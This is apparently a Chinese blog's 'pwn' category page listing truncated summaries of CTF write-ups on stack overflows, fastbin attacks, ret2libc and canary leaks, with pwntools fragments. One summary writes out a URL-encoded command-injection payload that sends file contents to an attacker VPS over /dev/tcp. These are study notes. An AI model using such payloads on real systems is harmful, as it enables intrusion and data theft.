文章分类 - pwn
摘要:题目背景 题目灵感来源于当年大一计导课做OJ的时候,遇到类似这种输入数组size的时候老是不知道应该把数组的实际size设置成多大。所以浅写了一个设置了数组的大小,但是没有对输入的size进行检查的冒泡排序算法。源代码如下 // gcc -g -no-pie -fno-stack-protector
阅读全文
摘要:跟着ctf-wiki学一下fastbin attack的原理,题目有时间再看看吧xD 环境搭建? 由于在上古时期还没有tcache(这是在glibc2-26加入的),所以要换一个低版本libc进行实验。 用到的方法(注:新版本gdb不需要更改.debug) https://sillyrabbit.c
阅读全文
摘要:签到 签到 ez_pwn from pwn import * context(os='linux', arch='i386', log_level='debug') context.log_level='info' elf=ELF('./p') rop=ROP(elf) # p=process('.
阅读全文
摘要:Web calc 利用 os.system(log) ,反引号执行子命令 开头1#注释绕过eval,末尾<绕过重定向,制表符绕过空格,最后cat /*重定向到vps上 num=1%23%60cat%09/%2A%60%3E/dev/tcp/vpsip/2333%3C ezpop 换行绕最后的#,fl
阅读全文
摘要:虽然开源,但spfa还是看得一知半解(下辈子一定学算法 保护全开,题目有backdoor dist下标可控。 这里可以实现任意读地址 而这里又可以实现任意写 跟进发现控制add函数的参数,to为偏移,dis为要写的值即可。 官方大致思路就是读出一堆地址,最后把main函数的返回地址写成backdoo
阅读全文
摘要:Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) int __cdecl main(int argc, const char **argv,
阅读全文
摘要:test_your_nc nc后cat flag test_your_gdb gdb看s2,让buf前两个字相等进if。拿好write写出的canary,通过gets栈溢出。题目有后门函数。 from pwn import * context.log_level = 'DEBUG' context.
阅读全文
摘要:32位: system_addr->caller返回地址,随便填->参数 payload = flat([b'A' * 104, system_addr, 0xdeadbeef, binsh_addr]) 64位: 1.system函数规定$rsp+0x40需要16字节对齐。一种方法:在调用syst
阅读全文
摘要:ASLR会让libc地址随机。利用stdout关联函数可以把libc中某个函数地址打印出来。 如puts打印puts的got表内容(后者存放puts真实地址),从而泄露libc基址 ctfwiki的部分exp(32bit) puts_plt = ret2libc3.plt['puts'] libc_
阅读全文
摘要:审题: 1,2都是简单的输入-输出。输出完之后会到此界面循环 1函数存在栈溢出漏洞 2函数存在格式化字符串漏洞 并且发现后门地址 经过调试,canary值不变。所以先进2得到canary,再回到1ROP 首先搞到格式化字符串的偏址 两种方式: 第一种:输入很多的%p,然后硬数(适合我这种无脑儿) 比
阅读全文
摘要:比赛时web老是坐牢,就想看看pwn坑有多大 先看ctfwiki的栈溢出介绍 CTF Wiki-Stack Overflow 还有函数调用栈的知识 http://www.cnblogs.com/clover-toeic/p/3755401.html https://www.cnblogs.com/c
阅读全文
浙公网安备 33010602011771号